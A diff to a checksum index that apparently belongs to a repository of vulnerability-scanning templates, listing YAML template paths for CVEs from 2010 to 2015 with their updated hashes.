+http/cves/2010/CVE-2010-1304.yaml:8cb54d53770fac6ecde79e1fde26257acd8a036b +http/cves/2010/CVE-2010-1305.yaml:9e77bbbff7c0f9dd771a8af54ef1e1dae4679be8 +http/cves/2010/CVE-2010-1306.yaml:b7ce113ff9b670775f3cdc0548c96c49e25110df +http/cves/2010/CVE-2010-1307.yaml:330c751730d932163d6392515af7ffd606930765 +http/cves/2010/CVE-2010-1308.yaml:ba211d27bc18523f631611c95bd0d3be487d7554 +http/cves/2010/CVE-2010-1312.yaml:d71b812b3f52691027366538296f548ef1bdacf5 +http/cves/2010/CVE-2010-1313.yaml:fb520f8a1a2a82dce32b418e5c7028ea8b6a5677 +http/cves/2010/CVE-2010-1314.yaml:69dfd7dbb6775240eab16f05bfe01196afba51e0 +http/cves/2010/CVE-2010-1315.yaml:1facf0de5dda2b00390d9dba80996dfcbbda7692 +http/cves/2010/CVE-2010-1340.yaml:ce8c8fc0a2554bc2e5311bc3472d78fe9af93b07 +http/cves/2010/CVE-2010-1345.yaml:2b771b568411a80730979bafe8677812c5576665 +http/cves/2010/CVE-2010-1352.yaml:d235832c93eaf4734966d40202e81a5d418df723 +http/cves/2010/CVE-2010-1353.yaml:e43b47b655a72284601f3a25929ca04acb482245 +http/cves/2010/CVE-2010-1354.yaml:8799ab89906715a3ffa9b9237f0ace5f6b7d2d54 +http/cves/2010/CVE-2010-1429.yaml:ed2793b78947dbd9b91046e96b15ecdafb57594b +http/cves/2010/CVE-2010-1461.yaml:426a0119cfc6603acf1c67b89fbd93e1cf6f17bd +http/cves/2010/CVE-2010-1469.yaml:4439dfe450e77758e9cb08b55d30b02379b553fb +http/cves/2010/CVE-2010-1470.yaml:2beaea9008b84e7a05ec7a425e200c1e29cc20e3 +http/cves/2010/CVE-2010-1471.yaml:cadac98cf0794e877ad18dc87062342d8df00db7 +http/cves/2010/CVE-2010-1472.yaml:ee26245583f9dbf746aa8884eb5132a7bf658fee +http/cves/2010/CVE-2010-1473.yaml:c767b85e96e9518c1376c39854fd20ca71582783 +http/cves/2010/CVE-2010-1474.yaml:ea7628a7d2d63598b851db057db7afc84e911c63 +http/cves/2010/CVE-2010-1475.yaml:34e161ae0bc32719e69798b39783120ef010beed +http/cves/2010/CVE-2010-1476.yaml:e75d8c68bec1de7e150bd57e245dd44d77b798b1 +http/cves/2010/CVE-2010-1478.yaml:a2245c2b2cb57bfec450f2a84617e2ff5bc7c6e7 +http/cves/2010/CVE-2010-1491.yaml:fa8539be1313014d6f8731cd595f777020655949 +http/cves/2010/CVE-2010-1494.yaml:68f2ed6282113395fb9fac5a841f07084b341546 +http/cves/2010/CVE-2010-1495.yaml:0ac616948cf2056eaa1809cd1c79d349df5c80bd +http/cves/2010/CVE-2010-1531.yaml:7507a91ccaefb4a112b6599de3fda1b861a008ff +http/cves/2010/CVE-2010-1532.yaml:d34cf6eb38ded67eeb0980a3c9300f20ece15587 +http/cves/2010/CVE-2010-1533.yaml:e825d43a411e08a19493aa8714eabe8f2f7fd542 +http/cves/2010/CVE-2010-1534.yaml:83b6e78a1b045801d94672777d9f25411b36321c +http/cves/2010/CVE-2010-1535.yaml:b2983f6aaf593286d7bf908444f05ebd0dd50652 +http/cves/2010/CVE-2010-1540.yaml:6f93bc3ba7f49e1cf70f13233298f13edde1c812 +http/cves/2010/CVE-2010-1586.yaml:ad07bb180eba177dc3d142a6146a82ec2c0f25ae +http/cves/2010/CVE-2010-1601.yaml:5fac001ff644bc04141a5c6ebd7fc76b41e766cc +http/cves/2010/CVE-2010-1602.yaml:5aa183858f99bf6b781e729abf96f12128feefab +http/cves/2010/CVE-2010-1603.yaml:ec3891b555ce3ad4817cd708ea71bdb3c62df3bc +http/cves/2010/CVE-2010-1607.yaml:67558c24d67668f27e893bd07ae0ab56bda8dac7 +http/cves/2010/CVE-2010-1653.yaml:4754fcfc070a0943253149257a6346eb05b97abc +http/cves/2010/CVE-2010-1657.yaml:9dfbdc8389af989ffff1d74152ce28f697185bdf +http/cves/2010/CVE-2010-1658.yaml:92f14938097a3d280ed0233aa6787f73453dbb45 +http/cves/2010/CVE-2010-1659.yaml:4e60e20bf2d9a412e007012074463d53e0b7cdce +http/cves/2010/CVE-2010-1714.yaml:fb42119814971f01318b8fcce3274a775eeb73ba +http/cves/2010/CVE-2010-1715.yaml:e0f05f84ffbba474b4a69771a098d999c16897ad +http/cves/2010/CVE-2010-1717.yaml:2ae6035659e3a4cff2eac1a04bfb82791c888ee4 +http/cves/2010/CVE-2010-1718.yaml:9f7c9a1ff6ebb18d9959a17b9131ac55f2aa4a54 +http/cves/2010/CVE-2010-1719.yaml:910ea367acb9b5ba6a22e9f3ba67ae62bbc8699b +http/cves/2010/CVE-2010-1722.yaml:2db8c28036b0bd56925cfa6fcc81e385cca70526 +http/cves/2010/CVE-2010-1723.yaml:57ad1d20730584cc925ea6edc2685e4f440367ba +http/cves/2010/CVE-2010-1858.yaml:414c80fb50de182be4d73e28cdfa3412adea646f +http/cves/2010/CVE-2010-1870.yaml:527acbc7533bd702ec3f93c5250df3465020d221 +http/cves/2010/CVE-2010-1875.yaml:31fc70a33cfbdd61567b7f544bdc4b4433b51d4b +http/cves/2010/CVE-2010-1878.yaml:ba85d647befc24f614ab6a24c4282263fe95c355 +http/cves/2010/CVE-2010-1952.yaml:fa104a8ff22bba4aea68a9f0d55d9f9ca2d27318 +http/cves/2010/CVE-2010-1953.yaml:51bc0fd649aae855761a7345485f4403bf09e988 +http/cves/2010/CVE-2010-1954.yaml:ee80dce0ec4d6cc7548014b87e32289b23f6e91e +http/cves/2010/CVE-2010-1955.yaml:2ca7f42dfed0d7c0c72f2e9c7d3d1772a70b3875 +http/cves/2010/CVE-2010-1956.yaml:31e76e0de624d7529131ddc3871faa1c5e9fc268 +http/cves/2010/CVE-2010-1957.yaml:180e5e9e97632f04c95e30d19ff13c4400955e26 +http/cves/2010/CVE-2010-1977.yaml:c4c9b787a3825f846cfb2f14f16cee06576e28da +http/cves/2010/CVE-2010-1979.yaml:6e640874bf86fe39ce6780984205c306fde1a87d +http/cves/2010/CVE-2010-1980.yaml:f9a31add3467a3b02934dfebcee1f12c3eb99e45 +http/cves/2010/CVE-2010-1981.yaml:7e5b274afceff3799457618eebd1790e6280a570 +http/cves/2010/CVE-2010-1982.yaml:b75593a151eeb6a23bf98b23bfc17a189be3bf5d +http/cves/2010/CVE-2010-1983.yaml:579850a6a490389c8c1819cdde2e04a6a6db5889 +http/cves/2010/CVE-2010-2033.yaml:0054ae70cf3a4fa394dde09d2887da08b02c3ff0 +http/cves/2010/CVE-2010-2034.yaml:ab249d90a5732010a28ef474b3356a9393293160 +http/cves/2010/CVE-2010-2035.yaml:7d49143bf7833cbf4a9f3aa8546e37c3110b69d7 +http/cves/2010/CVE-2010-2036.yaml:512b0101b99a34f2922d947b30fc960490b5d9ad +http/cves/2010/CVE-2010-2037.yaml:78a6288a22a043f656481b7a91fb72b30d4e48c7 +http/cves/2010/CVE-2010-2045.yaml:8bd745928d05cc91407a6ad8a1368c90c7116c44 +http/cves/2010/CVE-2010-2050.yaml:792241c1e36a600014c7803c95c78d7462b69ac7 +http/cves/2010/CVE-2010-2122.yaml:be05f90caaca99773b8780c7d25fb118472630b0 +http/cves/2010/CVE-2010-2128.yaml:9fcc095b3c6bb58b1382dbf171a7692fead8d114 +http/cves/2010/CVE-2010-2259.yaml:57dc22471c65f52408d983684f6dd13a0d4da696 +http/cves/2010/CVE-2010-2307.yaml:a091b02fea4b061d52cb3bac207c01835056c7d4 +http/cves/2010/CVE-2010-2507.yaml:c0fa8ca4b5d8903fbb2afcb26f697c11e2f7443d +http/cves/2010/CVE-2010-2680.yaml:9297403c3e7e1e5d1a1a5ba58cbe91f3da8fea47 +http/cves/2010/CVE-2010-2682.yaml:13d07957fe13d1d1ed6a96a15aadd132a1b45530 +http/cves/2010/CVE-2010-2857.yaml:85d6bd23fddcbd29196beba0e281c33865d58182 +http/cves/2010/CVE-2010-2861.yaml:a4daef879c5fcd3c8e9a29dd89ecb2957612bd65 +http/cves/2010/CVE-2010-2918.yaml:96fe06af526ed1be4b8b4712c112d144759edd4d +http/cves/2010/CVE-2010-2920.yaml:b327f1425b04f80d7090afe6e8cf7a8c42744eac +http/cves/2010/CVE-2010-3203.yaml:ba4de6d46fd7db0c415a8e60e8cad065c76432e1 +http/cves/2010/CVE-2010-3426.yaml:6ae68c838f14997ff101d4dcb6ab478c63ab7687 +http/cves/2010/CVE-2010-4231.yaml:3b191b7eebc6480463be74a200628406c6fffde0 +http/cves/2010/CVE-2010-4239.yaml:33059c7b9f91a862f532280aa05c0da7a3f50768 +http/cves/2010/CVE-2010-4282.yaml:8ac266028bd2b80878d6395e23d447a41fdf8450 +http/cves/2010/CVE-2010-4617.yaml:87d2dfa927be4d28da7acce24f812442f45e8246 +http/cves/2010/CVE-2010-4719.yaml:3d73f0f09819b8dfa1dd4d5ba8d654f562f0380d +http/cves/2010/CVE-2010-4769.yaml:8afe19453364503f6af925df90034b8d2dad3b8b +http/cves/2010/CVE-2010-4977.yaml:bcafa2bfc545fde9ee33e2b80876cfd840b37220 +http/cves/2010/CVE-2010-5028.yaml:54debbb7df7386e62cc7a8882f898ad43e92e4f8 +http/cves/2010/CVE-2010-5278.yaml:7160fabd5ef138f65b2d580b847158490cd753d8 +http/cves/2010/CVE-2010-5286.yaml:6cc6f5eb7ac353b77cd9fc767b295f437b36cdfc +http/cves/2011/CVE-2011-0049.yaml:ea9d325b56f9eec31e48d2e3fa2de2851ff42bec +http/cves/2011/CVE-2011-1669.yaml:44d718921a5709c9953937949d4845d853b2de90 +http/cves/2011/CVE-2011-2744.yaml:af5ee511c1ed71ff60d22fc20d430756bcf59616 +http/cves/2011/CVE-2011-2780.yaml:d6d7dfe0edd942306ebd3a7b03bf5a49a7f397cc +http/cves/2011/CVE-2011-3315.yaml:6e62d593853273e7b22c33be24a3ca98d10ef5eb +http/cves/2011/CVE-2011-4336.yaml:a4b030e5912cbc17a5af8eb473e39040772a33f0 +http/cves/2011/CVE-2011-4618.yaml:8553335e851fa212e0f266bd390c18be0c42aded +http/cves/2011/CVE-2011-4624.yaml:dc033f0913abb8dcf5a98acd001d18a217e84b82 +http/cves/2011/CVE-2011-4804.yaml:750a61e46166a68257edecadbf7bde9484cdea00 +http/cves/2011/CVE-2011-4926.yaml:7dcbfd14fbc9377516d737790fdbef6075f0072d +http/cves/2011/CVE-2011-5106.yaml:c7ad5dd926168a115ad437c8bf66cf66cba3b565 +http/cves/2011/CVE-2011-5107.yaml:f3e165b1c283bd9560c2f892e98af07ffe992d58 +http/cves/2011/CVE-2011-5179.yaml:1a06a12a892154b3f166d26bd1d25e238fdc60a1 +http/cves/2011/CVE-2011-5181.yaml:aff02409a902c6b5b43826f586cb9dc19c25c6bb +http/cves/2011/CVE-2011-5252.yaml:0f3ccd977b0c94a1d9f2efe6d96895e7b08f3064 +http/cves/2011/CVE-2011-5265.yaml:8ffe6f07098294078e08af52707f3443740521bc +http/cves/2012/CVE-2012-0392.yaml:e6d46bb92141487b303ed5546977416788a8b50e +http/cves/2012/CVE-2012-0394.yaml:1a64919e45cbb35d54e03766081ecdbd06c8b10e +http/cves/2012/CVE-2012-0896.yaml:388a1bba6cf994a674b58d2e72d3ae0c7a66d906 +http/cves/2012/CVE-2012-0901.yaml:aa0f0af57bb4fab88bc8d76886e896955d584746 +http/cves/2012/CVE-2012-0981.yaml:dc39a9c6a6150eb02cb7ca20fc6b674f2b2821ec +http/cves/2012/CVE-2012-0991.yaml:587e6a0b1836bd9dcf57375fc3999b4ec3c2a743 +http/cves/2012/CVE-2012-0996.yaml:7dcba98e5fcfe065442742bb9b994711bd2acb16 +http/cves/2012/CVE-2012-1226.yaml:7761ea0931df034b1b2b5d74d04d5fd05b8a6b7f +http/cves/2012/CVE-2012-1823.yaml:a8c4dbb2bf70cf8465634125a91860ad15c777d4 +http/cves/2012/CVE-2012-1835.yaml:5bc7b3f0f5ac2b1f3860b968b47e50a49979b2c5 +http/cves/2012/CVE-2012-2371.yaml:f98cae72918e615a19e9daedc04dd5ff7b5ec55f +http/cves/2012/CVE-2012-3153.yaml:9121ac5ff604d47a96f33d7f8fca461527eed26d +http/cves/2012/CVE-2012-4032.yaml:12435dcf43f9e700ff51f060f1ab1b4081783a5f +http/cves/2012/CVE-2012-4242.yaml:ccbeee2b7e3d78d469a1121f138d5baa4c300178 +http/cves/2012/CVE-2012-4253.yaml:ac15d87d1010f70c8bbcd42d42815caab163c2c1 +http/cves/2012/CVE-2012-4273.yaml:6ac1baf9dea5ebf34aad0a6a6a64d58d4497c6a7 +http/cves/2012/CVE-2012-4547.yaml:7905be8e06e83d8937d3be301960ff207174a22e +http/cves/2012/CVE-2012-4768.yaml:31f36330d8faf46301388809c19808d3a8d12b29 +http/cves/2012/CVE-2012-4878.yaml:b1ca2cc0f4c68e3ea1c617e641e391260805132e +http/cves/2012/CVE-2012-4889.yaml:cd570d3d30b81ab6dbb292644712766927983e30 +http/cves/2012/CVE-2012-4940.yaml:bc88596710c840abc1c5482a4f79253b88c73277 +http/cves/2012/CVE-2012-4982.yaml:118662d3940d687da81f49e7f3e221298a977ff2 +http/cves/2012/CVE-2012-5321.yaml:a5157468cffe6642f2fc9f1219933d9d5494e529 +http/cves/2012/CVE-2012-5913.yaml:bbbaaa7b74b1fd05eba08f79b07495df1a12355e +http/cves/2012/CVE-2012-6499.yaml:9bdeda223ec46cf7eb75d3a423364226d602a964 +http/cves/2013/CVE-2013-1965.yaml:95a2be75143255d3f0f2de047f2e4790b35b26e8 +http/cves/2013/CVE-2013-2248.yaml:a2f48733b75624dafb1c5573b0dbb7c312f994f4 +http/cves/2013/CVE-2013-2251.yaml:333751cc0f5931166f8ca04f10508545f45d580b +http/cves/2013/CVE-2013-2287.yaml:0af24c03b2f2b475699cfe58dffa071aaaaa13c1 +http/cves/2013/CVE-2013-2621.yaml:ad89162cad27741718a1705e75d276e0abdff934 +http/cves/2013/CVE-2013-3526.yaml:091490a289e91752e36805a1572a24c17689c191 +http/cves/2013/CVE-2013-3827.yaml:becfefddbd50e423bc3f71b1d0b4f4a7d400fa1f +http/cves/2013/CVE-2013-4117.yaml:c962ba0ff6831e2934f413fec835f3df3cfa4d65 +http/cves/2013/CVE-2013-4625.yaml:d90300c2b8242bc4b106790bb5072c78d63ed294 +http/cves/2013/CVE-2013-5528.yaml:b6fdb74046c518f5223684c49926345635e59a23 +http/cves/2013/CVE-2013-5979.yaml:33079a7f4ee7499a9b4194fb625efd28b97805d7 +http/cves/2013/CVE-2013-6281.yaml:2a4e94ba2fee22012eb05f1100b4bfd2012805fe +http/cves/2013/CVE-2013-7091.yaml:f0dd7f6a32f55543cfb4873cedcd314a74e23446 +http/cves/2013/CVE-2013-7240.yaml:1ba497ccd6d73a95cb185e0d1349f2ea01fe4ffd +http/cves/2013/CVE-2013-7285.yaml:c111b308ab6016e4206bb0f29f52aa4c4f9e7825 +http/cves/2014/CVE-2014-10037.yaml:9236e82695c118ae1f0a917abb2d74cd2b5a0b51 +http/cves/2014/CVE-2014-1203.yaml:f4a299393667caed74afb17a2208ce923a21742a +http/cves/2014/CVE-2014-2321.yaml:ff4dd70a7ad95853c589b7df2a7aa966e6648958 +http/cves/2014/CVE-2014-2323.yaml:a327fb6ab5840d880108ffbf8b41c40c46e1c54d +http/cves/2014/CVE-2014-2383.yaml:4818d755a111b89307e48b1d333932cbdad8027c +http/cves/2014/CVE-2014-2908.yaml:a7fd9d7f55eac3c97ad352f8c726222d4045a4ff +http/cves/2014/CVE-2014-2962.yaml:c52aa53e79c1503ed963b164476b337ff9925a7b +http/cves/2014/CVE-2014-3120.yaml:9afa4081aca45231730f8d7ee86c5ecaa68fa3dc +http/cves/2014/CVE-2014-3206.yaml:008ae676a09f650b9880176f7480044999fc2460 +http/cves/2014/CVE-2014-3704.yaml:0951f010bb55acbb00eb9bc3fa2afe17e93da224 +http/cves/2014/CVE-2014-3744.yaml:561320b3815435d2b6ac3631d778f05c60cea6e0 +http/cves/2014/CVE-2014-4210.yaml:7bd1e5b4d3ebc5f3d39e1d39a035922168d8affc +http/cves/2014/CVE-2014-4513.yaml:c1bf9f7d4376f41105815164495f9c339a3bd45d +http/cves/2014/CVE-2014-4535.yaml:75821a714999aed019d3ee5afd54d78c69830255 +http/cves/2014/CVE-2014-4536.yaml:8d4d7199346a755783deab95baa5b3646d1715a0 +http/cves/2014/CVE-2014-4539.yaml:572a36b31ec40a7bc7a00bf0fd80282bec3cf076 +http/cves/2014/CVE-2014-4544.yaml:1f1bb1dc31bd693626b55297474016c5391cccf7 +http/cves/2014/CVE-2014-4550.yaml:83f56945220226806675c77b282006cabe62588b +http/cves/2014/CVE-2014-4558.yaml:2108a20b5eebad2821609cb3678c99ecf6686adb +http/cves/2014/CVE-2014-4561.yaml:02777c64aae621fbe7c1abeeb98a9299135d4c3e +http/cves/2014/CVE-2014-4592.yaml:415d568fff78098f2df1eaef33a64bc81af3e12a +http/cves/2014/CVE-2014-4940.yaml:ac9f8792b58e93e0590e326eba0bc6ab5dac64e6 +http/cves/2014/CVE-2014-4942.yaml:36fde75ba9e98de2c461ddf9011d242a4bccdbac +http/cves/2014/CVE-2014-5111.yaml:5ec08b80491f1c608c2d60bdfbdef679ca44a885 +http/cves/2014/CVE-2014-5258.yaml:840ddd896647f65a388f2c2cbb1ac1e1fe2b3b39 +http/cves/2014/CVE-2014-5368.yaml:6e42a7bd105a3dbd914d6ce01af09146d14c2719 http/cves/2014/CVE-2014-6271.yaml:32765dd37aaefa0a38da0aba36b45bca91cd4d62 -http/cves/2014/CVE-2014-6287.yaml:14c032364a518f5da3a96131c5fe62ff8ffb5e8e -http/cves/2014/CVE-2014-6308.yaml:b3a3007adac94ce91e37cc44af2af4003922a03a -http/cves/2014/CVE-2014-8676.yaml:0169e31c08bffe6ea30070be43aa209dbca1717a -http/cves/2014/CVE-2014-8682.yaml:5186c112a9ac0c64f21661bc84e9af778eeb8a20 -http/cves/2014/CVE-2014-8799.yaml:e5857435c57b3f5586588a09cc9c830359f9ba64 -http/cves/2014/CVE-2014-9094.yaml:99ce2f72ba9f25af337f3a9442bb65f2561aaa70 -http/cves/2014/CVE-2014-9119.yaml:bf9a28b7dca5fc88f5e0b0708cf3d5ec0896c394 -http/cves/2014/CVE-2014-9180.yaml:b1b0b4ac2d3e5c5f44b251be973e1c3f7a2b6295 -http/cves/2014/CVE-2014-9444.yaml:5c4c929f4202a29f8c208547e5ec26d8db43823f -http/cves/2014/CVE-2014-9606.yaml:767b74df0cdc66035baf87f322e6f896f9725c88 -http/cves/2014/CVE-2014-9607.yaml:c34e639a7aa03a344d4af53079d5c2079a8148f4 -http/cves/2014/CVE-2014-9608.yaml:c890988bb8c1af5cdb1878b9e2c96e814db37c10 -http/cves/2014/CVE-2014-9609.yaml:eeeba0359fba0b44679302bf43f87efcf02fd95e -http/cves/2014/CVE-2014-9614.yaml:379932e74e90ea384558c1b29c87fde3da411eb4 -http/cves/2014/CVE-2014-9615.yaml:12af3cbdd66a49ae629d33681c1593d658a0a97b -http/cves/2014/CVE-2014-9617.yaml:9e7b832d204431292d784ace49befb86b9286267 -http/cves/2014/CVE-2014-9618.yaml:eb38fde913928221d2df6e875d966697d44d407c -http/cves/2015/CVE-2015-0554.yaml:c55576ac01e5e9a5dcbfb89194bc6763ae8ab490 -http/cves/2015/CVE-2015-1000005.yaml:a875098d13c45166e21adbf9c846e439b6549c38 -http/cves/2015/CVE-2015-1000010.yaml:7977b216a498aeddfb2e819207ecaaeb0f6f433b -http/cves/2015/CVE-2015-1000012.yaml:a709aeb85f889f6662c8c5b01c1ee1a82ff0f98e -http/cves/2015/CVE-2015-1427.yaml:bc41aebb85e962b85afd497e53fc8a5f98bf9c05 -http/cves/2015/CVE-2015-1503.yaml:4a5c0c4b4090677ac58414ee7140e70cb2f47a51 -http/cves/2015/CVE-2015-1579.yaml:b2deb3c39c883893757ac6e23b9c2517cc1281b4 -http/cves/2015/CVE-2015-1880.yaml:7d599a6e52c002e4f199dad94ef3781d4e747931 +http/cves/2014/CVE-2014-6287.yaml:66abf9510605edbf1064cbff793d0beeccf2c9dd +http/cves/2014/CVE-2014-6308.yaml:12aeff92b6cedcb2b90cfad3154d23f33bc52c39 +http/cves/2014/CVE-2014-8676.yaml:4933f9732c7ed3f3fa6c4e693e05da68b415ee9a +http/cves/2014/CVE-2014-8682.yaml:1bf8a4e786c6985359fcffc18927af6c58b03d6a +http/cves/2014/CVE-2014-8799.yaml:6258dc310dd80827b05a10cfabc9d89a1fd39f0f +http/cves/2014/CVE-2014-9094.yaml:25253c12ae9a4d351c945da78941c01fb3602f5d +http/cves/2014/CVE-2014-9119.yaml:e35847b2b51cc6c40de6c7560452065e3080bd15 +http/cves/2014/CVE-2014-9180.yaml:9bb9c8a214f1ed4bfedb5ff9723368075b3a6553 +http/cves/2014/CVE-2014-9444.yaml:77073d403a1ae6bd502c41ba82ded342da10bd90 +http/cves/2014/CVE-2014-9606.yaml:b39c2dc128d212b31afd2fb5cb68d6b5e8f5b533 +http/cves/2014/CVE-2014-9607.yaml:1c1a187db6be56bce756a53c1aad4a16106f2cb1 +http/cves/2014/CVE-2014-9608.yaml:a346826353a433aeb440b5f276db3f6da36f02d4 +http/cves/2014/CVE-2014-9609.yaml:69141fb5bf023b3c9a0df2f7120b0564a424ab26 +http/cves/2014/CVE-2014-9614.yaml:48cd4acbbbc4849b5d2e85d141705ace95c2c895 +http/cves/2014/CVE-2014-9615.yaml:e40be7192a90027d53a86e15b7b1b6ebd7955d77 +http/cves/2014/CVE-2014-9617.yaml:b8cb1990771b061280833469ef3680759a1cc91e +http/cves/2014/CVE-2014-9618.yaml:42301830c3bf00ac5448dd655ceefba726d3a47e +http/cves/2015/CVE-2015-0554.yaml:1ae99500155b55add28fc34662b2cbd14da3441b +http/cves/2015/CVE-2015-1000005.yaml:1c4a3ce1c7715091b7e507dfdfd2dccefff4e4ca +http/cves/2015/CVE-2015-1000010.yaml:c260d186b351051c075ceebc24953b25ac44bb51 +http/cves/2015/CVE-2015-1000012.yaml:da56f34c29108fe7c907a14616c0b907ecc674e1 +http/cves/2015/CVE-2015-1427.yaml:d7a751e9fd0450d18d64f775df66e0d63fce1cdf +http/cves/2015/CVE-2015-1503.yaml:978cd0dc3b631be909f016f4b585b0b83741aac2 +http/cves/2015/CVE-2015-1579.yaml:94a57fa6449281b4c2fbf4a2efc8258268b39754 +http/cves/2015/CVE-2015-1880.yaml:0ef17b9767159e5d157e3ef5eff2e93f16271c04 http/cves/2015/CVE-2015-20067.yaml:785c1c2db6a4483739645939a7ba573a05503406 -http/cves/2015/CVE-2015-2067.yaml:3da9a21fe4d8731eb1cdd754f973869e0c84fdbf -http/cves/2015/CVE-2015-2068.yaml:350240c982053c4abed226ec70e106ac686291f2 -http/cves/2015/CVE-2015-2080.yaml:180c0d9b39eebb25504e19d83aaab1b4cf8bfa97 -http/cves/2015/CVE-2015-2166.yaml:5c7b165905fe6bdd974323c57fa75d42668626a4 -http/cves/2015/CVE-2015-2196.yaml:40e30dd20646f5def7d76df0a2ff5bd2d5c6bfa9 -http/cves/2015/CVE-2015-2755.yaml:61ea5d993d635d8ed1e0d70d20d9acc0feed60cd -http/cves/2015/CVE-2015-2794.yaml:ba064904aecb2a2d6c43afa9c4b014fe48531535 -http/cves/2015/CVE-2015-2807.yaml:469bbcf29e948b7ab6906aa2bfcfee1885541f38 -http/cves/2015/CVE-2015-2863.yaml:4479beacef9707ef297d61a4a357119d030687df -http/cves/2015/CVE-2015-2996.yaml:224ffb60b764113f93b766fc435f02f06890682e -http/cves/2015/CVE-2015-3035.yaml:a944c175270123c3024e25de033f2df457d62b05 -http/cves/2015/CVE-2015-3224.yaml:404fa20762519099bfbbf77a9790069327e5fdf2 -http/cves/2015/CVE-2015-3337.yaml:f0ce32676f18f3128f95db81f6e2fabc6329a8fb -http/cves/2015/CVE-2015-3648.yaml:71bbd9fcb3cec2f10500e621f62cf4f143c60acd -http/cves/2015/CVE-2015-3897.yaml:fe0911cc228ecaf79bcd54fe3e26ac3a34a0a567 -http/cves/2015/CVE-2015-4050.yaml:8965a3c8c373643c1f072258448f7e952d657766 -http/cves/2015/CVE-2015-4062.yaml:5b7d3191decce80498c941bc55127600079437bb -http/cves/2015/CVE-2015-4063.yaml:abddad3b1cf6b588c4956943a3ca1382d7c2f3a2 -http/cves/2015/CVE-2015-4074.yaml:8d214548758aa611a9ca2e1c6f8ee13d7727a996 -http/cves/2015/CVE-2015-4127.yaml:5e8d3b2663895c0181b9681c8158746512623c51 -http/cves/2015/CVE-2015-4414.yaml:60dd619dc2036b69b9ade61a22971085f6c46205 -http/cves/2015/CVE-2015-4632.yaml:d9de9ae3cefebdaa60893aa2e41015554cc7ad42 -http/cves/2015/CVE-2015-4666.yaml:8d9e8028c968c4e774b2352ac5fddb2625002e12 -http/cves/2015/CVE-2015-4668.yaml:9b6331e9ba94f99b52a9b6bb82c43c8cad086d3b -http/cves/2015/CVE-2015-4694.yaml:c01007d365977be07c66607046b55d4c3a3ff950 -http/cves/2015/CVE-2015-5354.yaml:2a6aec9955dacf5f42b9ce4cf7498194c49ef05b -http/cves/2015/CVE-2015-5461.yaml:f44e410aa824b7405bf89d5648490d0b588952ba -http/cves/2015/CVE-2015-5469.yaml:781cc06d663dfb6a7d668a5a1ea3486fa4634b2f -http/cves/2015/CVE-2015-5471.yaml:f80151b860b4eb886a701a25fe7e40c9b44e141b -http/cves/2015/CVE-2015-5531.yaml:51981be093fab43437a02220401c7580697fdd58 -http/cves/2015/CVE-2015-5688.yaml:0641cf8afb8a3c254920d2f824dcba30c7a881d8 -http/cves/2015/CVE-2015-6477.yaml:e8d977621a1217949411291bdde198c99e749227 -http/cves/2015/CVE-2015-6544.yaml:74ec01311930beff9b0754f339ef0d08d8faeec9 -http/cves/2015/CVE-2015-6920.yaml:888a663edcc9f24f43607cee98be57556e3d0e37 -http/cves/2015/CVE-2015-7245.yaml:15570a64dd3c695e43c0026f6cca1b2c223c6ee7 +http/cves/2015/CVE-2015-2067.yaml:dec89c5181edaf5c5e83befd5de5ef9fa4df4593 +http/cves/2015/CVE-2015-2068.yaml:b29c652ca64023fa073edd7cef083ccb10e587ea +http/cves/2015/CVE-2015-2080.yaml:688ca1b3ec425931abe3ca35752bf46d6b2c1000 +http/cves/2015/CVE-2015-2166.yaml:3ac9939900499a3256095aa1edadf706e8532fc3 +http/cves/2015/CVE-2015-2196.yaml:7145d0fd41809d934f81450bf9a59c4df58e68f9 +http/cves/2015/CVE-2015-2755.yaml:ac546364dd600f05b9f73d0575d88e6ea2f272b5 +http/cves/2015/CVE-2015-2794.yaml:2a21d8cb49cf8cca7d44b93f1fdb92e69f7b4296 +http/cves/2015/CVE-2015-2807.yaml:66efb701006c346cd2c501f6b9941c842a70d6de +http/cves/2015/CVE-2015-2863.yaml:ca832ac5bd6475e80c519e6c5214d1d5be24ad52 +http/cves/2015/CVE-2015-2996.yaml:dcfd6f733b42e5708e4be830e6ce14fe1c05bf9b +http/cves/2015/CVE-2015-3035.yaml:fa1eb5c1f42fd7d762d2a34abcf71a71f21e0b37 +http/cves/2015/CVE-2015-3224.yaml:4f586b104abe438f8909de766b2d68f84195e2e1 +http/cves/2015/CVE-2015-3337.yaml:37e9abdda2b90f6a7eed955ecc6bb90bf9613bcc +http/cves/2015/CVE-2015-3648.yaml:37eb95ef717193bf42ff0589e785c7b3863ec016 +http/cves/2015/CVE-2015-3897.yaml:3a6c9fc2eeda8d820874e1037524b391140c1459 +http/cves/2015/CVE-2015-4050.yaml:8fe54ede9ae4c3ced55e68724fae09e6325fceaa +http/cves/2015/CVE-2015-4062.yaml:3335c0078b4827d016bbce2d7c5c5ec7cb462a4c +http/cves/2015/CVE-2015-4063.yaml:ade8052a039067522df5d8fd82c64b8ceccb1870 +http/cves/2015/CVE-2015-4074.yaml:df254c3e6342109b411567be8bebb5fe9898e8f3 +http/cves/2015/CVE-2015-4127.yaml:239251e73d9340b773800a54b6fd820d4922d6c3 +http/cves/2015/CVE-2015-4414.yaml:fdb00f131b3f44bb74d5e7686d83b20818f279cb +http/cves/2015/CVE-2015-4632.yaml:53574ae16c55683245a614c28dcc558b6b3ed342 +http/cves/2015/CVE-2015-4666.yaml:cd9e497dfb5aac362358a2704baeb6aa68e3ed1e +http/cves/2015/CVE-2015-4668.yaml:f3976c7b06181f3e44eb4f2653334803dccce5c0 +http/cves/2015/CVE-2015-4694.yaml:808c12fc62ee712d9185ffedf797210a71db2eb0 +http/cves/2015/CVE-2015-5354.yaml:efff745c15a88b0ec885b56dbe69e67544304ed1 +http/cves/2015/CVE-2015-5461.yaml:bf333d7b0435e11556c9b1de2b326873b45a7c24 +http/cves/2015/CVE-2015-5469.yaml:59ba9670334b5f15b5d6afab02325ccff7bddbd8 +http/cves/2015/CVE-2015-5471.yaml:4db7671575e9c532f7208a5ded0f5346ffd04a42 +http/cves/2015/CVE-2015-5531.yaml:75d622bc2de07dbe0e558f2a7c47765b9152a078 +http/cves/2015/CVE-2015-5688.yaml:5d2134c1c65617f037f0184a7c7a7316367b63eb +http/cves/2015/CVE-2015-6477.yaml:7539d01eccb8b4d93b69caa3bd9edebe7dbdd6f7 +http/cves/2015/CVE-2015-6544.yaml:90c938060e1fe0644c28f146fa6000ef11124635 +http/cves/2015/CVE-2015-6920.yaml:ed2cc2f4d5169eda7c7de2c0b2cc49b9d95445be +http/cves/2015/CVE-2015-7245.yaml:224d01b3aecb0aec740f111f1fae1b8ac4cc18f8 http/cves/2015/CVE-2015-7297.yaml:45a201fbefbc2568541b568309fed6c6f11b242f 